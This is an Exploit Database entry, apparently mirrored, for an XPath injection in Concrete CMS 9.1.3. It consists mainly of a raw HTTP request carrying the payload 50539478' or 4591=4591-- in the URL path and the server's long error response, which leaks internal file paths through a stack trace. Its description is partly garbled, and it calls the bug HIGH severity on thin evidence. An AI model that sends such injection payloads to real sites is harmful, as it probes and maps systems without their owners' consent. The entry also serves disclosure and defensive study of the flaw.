Concrete5 CME v9.1.3 – Xpath injection

• Exploit Database
• 19 阅读

• 作者： nu11secur1ty
  日期： 2023-03-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51144/

• ## Exploit Title: Concrete5 CME v9.1.3 - Xpath injection
  ## Author: nu11secur1ty
  ## Date: 11.28.2022
  ## Vendor: https://www.concretecms.org/
  ## Software: https://www.concretecms.org/download
  ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3
  
  ## Description:
  The URL path folder `3` appears to be vulnerable to XPath injection attacks.
  The test payload 50539478' or 4591=4591-- was submitted in the URL
  path folder `3`, and an XPath error message was returned.
  The attacker can flood with requests the system by using this
  vulnerability to untilted he receives the actual paths of the all
  content of this system which content is stored on some internal or
  external server.
  
  ## STATUS: HIGH Vulnerability
  
  [+] Exploits:
  00:
  ```GET
  GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js
  HTTP/1.1
  Host: pwnedhost.com
  Accept-Encoding: gzip, deflate
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Accept-Language: en-US;q=0.9,en;q=0.8
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
  AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
  Safari/537.36
  Connection: close
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
  Sec-CH-UA-Platform: Windows
  Sec-CH-UA-Mobile: ?0
  Content-Length: 0
  ```
  
  [+] Response:
  
  ```HTTP
  HTTP/1.1 500 Internal Server Error
  Date: Mon, 28 Nov 2022 15:32:22 GMT
  Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
  X-Powered-By: PHP/7.4.30
  Connection: close
  Content-Type: text/html;charset=UTF-8
  Content-Length: 592153
  
  <!DOCTYPE html><!--
  
  
  Whoops\Exception\ErrorException: include(): Failed opening
  &#039;C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensive\0fea6a13c52b4d47\25368f24b045ca84\38a865804f8fdcb6\57cd99682e939275\3e7d68124ace5663\5a578007c2573b03\d35376a9b3047dec\fee81596e3895419.php&#039;
  for inclusion (include_path=&#039;C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR&#039;)
  in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php
  on line 26
  Stack trace:
  1. Whoops\Exception\ErrorException->()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
  2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
  3. Stash\Driver\FileSystem\NativeEncoder->deserialize()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201
  4. Stash\Driver\FileSystem->getData()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:631
  5. Stash\Item->getRecord()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:321
  6. Stash\Item->executeGet()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:252
  7. Stash\Item->get()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:346
  8. Stash\Item->isMiss()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Cache\Adapter\LaminasCacheDriver.php:67
  9. Concrete\Core\Cache\Adapter\LaminasCacheDriver->internalGetItem()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-cache\src\Storage\Adapter\AbstractAdapter.php:356
   10. Laminas\Cache\Storage\Adapter\AbstractAdapter->getItem()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:601
   11. Laminas\I18n\Translator\Translator->loadMessages()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:434
   12. Laminas\I18n\Translator\Translator->getTranslatedMessage()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:349
   13. Laminas\I18n\Translator\Translator->translate()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Localization\Translator\Adapter\Laminas\TranslatorAdapter.php:69
   14. Concrete\Core\Localization\Translator\Adapter\Laminas\TranslatorAdapter->translate()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\bootstrap\helpers.php:27
   15. t() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\blocks\top_navigation_bar\view.php:47
   16. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Block\View\BlockView.php:267
   17. Concrete\Core\Block\View\BlockView->renderViewContents()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
   18. Concrete\Core\View\AbstractView->render()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\Area.php:853
   19. Concrete\Core\Area\Area->display()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\GlobalArea.php:128
   20. Concrete\Core\Area\GlobalArea->display()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\elements\header.php:11
   21. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:125
   22. Concrete\Core\View\View->inc()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\view.php:4
   23. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:329
   24. Concrete\Core\View\View->renderTemplate()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:291
   25. Concrete\Core\View\View->renderViewContents()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
   26. Concrete\Core\View\AbstractView->render()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\controllers\single_page\page_not_found.php:19
   27. Concrete\Controller\SinglePage\PageNotFound->view()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
   28. call_user_func_array()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
   29. Concrete\Core\Controller\AbstractController->runAction()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:188
   30. Concrete\Core\Http\ResponseFactory->controller()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:95
   31. Concrete\Core\Http\ResponseFactory->notFound()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:390
   32. Concrete\Core\Http\ResponseFactory->collectionNotFound()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:234
   33. Concrete\Core\Http\ResponseFactory->collection()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:132
   34. Concrete\Core\Http\DefaultDispatcher->handleDispatch()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:60
   35. Concrete\Core\Http\DefaultDispatcher->dispatch()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\DispatcherDelegate.php:39
   36. Concrete\Core\Http\Middleware\DispatcherDelegate->next()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\FrameOptionsMiddleware.php:39
   37. Concrete\Core\Http\Middleware\FrameOptionsMiddleware->process()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
   38. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\StrictTransportSecurityMiddleware.php:36
   39. Concrete\Core\Http\Middleware\StrictTransportSecurityMiddleware->process()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
   40. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ContentSecurityPolicyMiddleware.php:36
   41. Concrete\Core\Http\Middleware\ContentSecurityPolicyMiddleware->process()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
   42. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\CookieMiddleware.php:35
   43. Concrete\Core\Http\Middleware\CookieMiddleware->process()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
   44. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ApplicationMiddleware.php:29
   45. Concrete\Core\Http\Middleware\ApplicationMiddleware->process()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
   46. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareStack.php:86
   47. Concrete\Core\Http\Middleware\MiddlewareStack->process()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultServer.php:85
   48. Concrete\Core\Http\DefaultServer->handleRequest()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\Run\DefaultRunner.php:125
   49. Concrete\Core\Foundation\Runtime\Run\DefaultRunner->run()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\DefaultRuntime.php:102
   50. Concrete\Core\Foundation\Runtime\DefaultRuntime->run()
  C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\dispatcher.php:45
   51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2
  
  
  --><html>
  <head>
  <meta charset="utf-8">
  <meta name="robots" content="noindex,nofollow"/>
  <meta name="viewport" content="width=device-width,
  initial-scale=1, shrink-to-fit=no"/>
  <title>Concrete CMS has encountered an issue.</title>
  
  <style>body {
  font: 12px "Helvetica Neue", helvetica, arial, sans-serif;
  color: #131313;
  background: #eeeeee;
  padding:0;
  margin: 0;
  max-height: 100%;
  
  text-rendering: optimizeLegibility;
  }
  a {
  text-decoration: none;
  }
  
  .Whoops.container {
  position: relative;
  z-index: 9999999999;
  }
  
  .panel {
  overflow-y: scroll;
  height: 100%;
  position: fixed;
  margin: 0;
  left: 0;
  top: 0;
  }
  
  .branding {
  position: absolute;
  top: 10px;
  right: 20px;
  color: #777777;
  font-size: 10px;
  z-index: 100;
  }
  .branding a {
  color: #e95353;
  }
  
  header {
  color: white;
  box-sizing: border-box;
  background-color: #2a2a2a;
  padding: 35px 40px;
  max-height: 180px;
  overflow: hidden;
  transition: 0.5s;
  }
  
  header.header-expand {
  max-height: 1000px;
  }
  
  .exc-title {
  margin: 0;
  color: #bebebe;
  font-size: 14px;
  }
  .exc-title-primary, .exc-title-secondary {
  color: #e95353;
  }
  
  .exc-message {
  font-size: 20px;
  word-wrap: break-word;
  margin: 4px 0 0 0;
  color: white;
  }
  .exc-message span {
  display: block;
  }
  .exc-message-empty-notice {
  color: #a29d9d;
  font-weight: 300;
  }
  
  .......
  
  ```
  
  
  ## Reproduce:
  [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)
  
  ## Proof and Exploit:
  [href](https://streamable.com/4f60ka)
  
  ## Time spent
  `03:00:00`
  
  
  -- 
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at https://packetstormsecurity.com/
  https://cve.mitre.org/index.html and https://www.exploit-db.com/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>